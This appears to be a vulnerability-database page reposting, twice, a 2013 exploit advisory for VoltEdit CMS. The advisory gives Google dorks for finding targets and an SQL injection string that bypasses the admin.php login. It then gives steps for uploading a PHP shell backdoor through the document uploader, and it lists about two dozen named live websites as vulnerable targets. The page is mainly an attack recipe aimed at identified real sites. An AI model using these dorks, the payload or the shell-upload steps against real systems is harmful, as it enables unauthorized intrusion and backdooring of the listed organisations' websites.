Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:29746
HistorySep 09, 2013 - 12:00 a.m.

VoltEdit CMS SQL Injection Admin Login Bypass & Shell Upload Vulnerability

2013-09-0900:00:00
vulners.com
481
JSON

==========================================================================================
VoltEdit CMS SQL Injection Admin Login Bypass & Shell Upload Vulnerability

:----------------------------------------------------------------------------------------------------------------------------------------:
: # Exploit Title : VoltEdit CMS SQL Injection Admin Login Bypass & Shell Upload Vulnerability
: # Date : 18 August 2013
: # Author : X-Cisadane
: # CMS Developer : http://www.ady-voltedge.com/website_development.php
: # Version : ALL
: # Category : Web Applications
: # Vulnerability : SQL Injection Admin Login Bypass & Shell Upload Vulnerability
: # Tested On : Version 26.0.1410.64 m (Windows XP SP 3 32-Bit English)
: # Greetz to : X-Code, Borneo Crew, Depok Cyber, Explore Crew, CodeNesia, Bogor-H, Jakarta Anonymous Club, Jabar Cyber, Winda Utari
:----------------------------------------------------------------------------------------------------------------------------------------:

A multiple vulnerabilities has been identified in "VoltEdit CMS", which could be exploited by attackers to bypass security restrictions into
admin panel. Login input is not well sanitized in admin.php which can lead to to include some specials chars used to change SQL syntax so we
can gain admin access. Successful exploitations allows attacker to access into administrative functions without requiring knowledge of the
password. An attackers while login as admin, may upload PHP Shell (Backdoor) use the document uploader feature.

DORKS (How to find the target) :

intext:VoltEdit cms
inurl:/doing_business_here.php
inurl:/map_room.php
inurl:/colleges_universities.php
Or use your own Google Dorks :)

Proof of Concept

[ 1 ] SQL Injection Admin Login Bypass
Find the target use the dorks above, for example I'm use this dork inurl:/doing_business_here.php
and got the target www.russellville.org/doing_business_here.php
Change the target URL to /admin.php, for example www.russellville.org/admin.php
After login form appeared, fill the Login ID and Password with '=0#
Gotcha! Pic : http://i43.tinypic.com/fmtesh.png

[ 2 ] Uploading Shell / PHP Backdoor
After login with Administrator Previllege, you can upload PHP Shell
Click Documents menu & Click Choose File
Upload your PHP Shell
Go to http://TARGET/documents/Your Shell.php
Example : http://www.russellville.org/documents/botak.php3

Example of the Vulnerable Sites :
http://www.businessreadywi.com/admin.php
http://www.adyvoltedge.com/index.php
http://www.jcjdc.net/admin.php
http://www.cortlandbusiness.com/admin.php
http://www.morgancoed.com/admin.php
http://www.russellville.org/admin.php
http://drumcountrybusiness.com/admin.php
http://madisoncountyida.com/admin.php
http://chooseeasterniowa.com/admin.php
http://www.putnamcountyindianaeconomicdevelopment.com/admin.php
http://www.foxcitiesregionalpartnership.com/admin.php
http://www.wedobusinesswi.com/admin.php
http://cayuga.adyvoltedge.com/admin.php
http://edwc.org/admin.php
http://www.russellville.org/admin.php
http://www.hancockedc.com/admin.php
http://www.purelansing.com/admin.php
http://www.mcedinc.com/admin.php
http://www.ocedp.com/admin.php
http://scottcountyin.com/admin.php
http://www.putnamcountyindianaeconomicdevelopment.com/admin.php
http://nchcedc.org/admin.php
http://www.jaspercountyin.com/admin.php
http://michiana.adyvoltedge.com/admin.php
http://www.thevalleypartnership.com/admin.php
http://scott.ady-voltedge.com/admin.php
http://highland.ady-voltedge.com/admin.php
etc …

Sent from my BlackBerry® smartphone from Sinyal Bagus XL, Nyambung Teruuusss…!

Proof of Concept.txt

==========================================================================================
VoltEdit CMS SQL Injection Admin Login Bypass & Shell Upload Vulnerability

:----------------------------------------------------------------------------------------------------------------------------------------:
: # Exploit Title : VoltEdit CMS SQL Injection Admin Login Bypass & Shell Upload Vulnerability
: # Date : 18 August 2013
: # Author : X-Cisadane
: # CMS Developer : http://www.ady-voltedge.com/website_development.php
: # Version : ALL
: # Category : Web Applications
: # Vulnerability : SQL Injection Admin Login Bypass & Shell Upload Vulnerability
: # Tested On : Version 26.0.1410.64 m (Windows XP SP 3 32-Bit English)
: # Greetz to : X-Code, Borneo Crew, Depok Cyber, Explore Crew, CodeNesia, Bogor-H, Jakarta Anonymous Club, Jabar Cyber, Winda Utari
:----------------------------------------------------------------------------------------------------------------------------------------:

A multiple vulnerabilities has been identified in "VoltEdit CMS", which could be exploited by attackers to bypass security restrictions into
admin panel. Login input is not well sanitized in admin.php which can lead to to include some specials chars used to change SQL syntax so we
can gain admin access. Successful exploitations allows attacker to access into administrative functions without requiring knowledge of the
password. An attackers while login as admin, may upload PHP Shell (Backdoor) use the document uploader feature.

DORKS (How to find the target) :

intext:VoltEdit cms
inurl:/doing_business_here.php
inurl:/map_room.php
inurl:/colleges_universities.php
Or use your own Google Dorks

Proof of Concept

[ 1 ] SQL Injection Admin Login Bypass
Find the target use the dorks above, for example I'm use this dork inurl:/doing_business_here.php
and got the target www.russellville.org/doing_business_here.php
Change the target URL to /admin.php, for example www.russellville.org/admin.php
After login form appeared, fill the Login ID and Password with '=0#
Gotcha! Pic : http://i43.tinypic.com/fmtesh.png

[ 2 ] Uploading Shell / PHP Backdoor
After login with Administrator Previllege, you can upload PHP Shell
Click Documents menu & Click Choose File
Upload your PHP Shell
Go to http://TARGET/documents/Your Shell.php
Example : http://www.russellville.org/documents/botak.php3

Example of the Vulnerable Sites :
http://www.businessreadywi.com/admin.php
http://www.adyvoltedge.com/index.php
http://www.jcjdc.net/admin.php
http://www.cortlandbusiness.com/admin.php
http://www.morgancoed.com/admin.php
http://www.russellville.org/admin.php
http://drumcountrybusiness.com/admin.php
http://madisoncountyida.com/admin.php
http://chooseeasterniowa.com/admin.php
http://www.putnamcountyindianaeconomicdevelopment.com/admin.php
http://www.foxcitiesregionalpartnership.com/admin.php
http://www.wedobusinesswi.com/admin.php
http://cayuga.adyvoltedge.com/admin.php
http://edwc.org/admin.php
http://www.russellville.org/admin.php
http://www.hancockedc.com/admin.php
http://www.purelansing.com/admin.php
http://www.mcedinc.com/admin.php
http://www.ocedp.com/admin.php
http://scottcountyin.com/admin.php
http://www.putnamcountyindianaeconomicdevelopment.com/admin.php
http://nchcedc.org/admin.php
http://www.jaspercountyin.com/admin.php
http://michiana.adyvoltedge.com/admin.php
http://www.thevalleypartnership.com/admin.php
http://scott.ady-voltedge.com/admin.php
http://highland.ady-voltedge.com/admin.php
etc …

JSON